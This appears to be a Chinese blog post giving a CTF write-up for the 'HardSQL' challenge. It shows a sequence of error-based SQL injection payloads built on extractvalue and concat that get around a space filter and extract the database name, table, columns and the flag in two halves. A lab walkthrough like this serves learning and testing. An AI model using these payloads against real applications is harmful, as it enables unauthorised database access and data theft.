[极客大挑战 2019]HardSQL

最新推荐文章于 2023-11-30 17:53:19 发布

祁行

最新推荐文章于 2023-11-30 17:53:19 发布

阅读量110

点赞数

分类专栏： web

本文链接：https://blog.csdn.net/m0_51426816/article/details/112760660

版权

23 篇文章 0 订阅

订阅专栏

尝试了一下发现空格在内的好多东西都被过滤掉了
在这里插入图片描述
学到了报错注入（空格用括号代替）

1'or(extractvalue(1,concat(0x7e,database())))#

得到库geek
在这里插入图片描述

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#

得到表
在这里插入图片描述

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

得到列
在这里插入图片描述

'or(extractvalue(1,concat(0x7e,(select(group_concat(password,20))from(H4rDsq1)where(id)like(1)))))#

查内容
在这里插入图片描述
只有一半flag，从右显示得到另一半

'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#

拼到一起得到完整flag

关注

专栏目录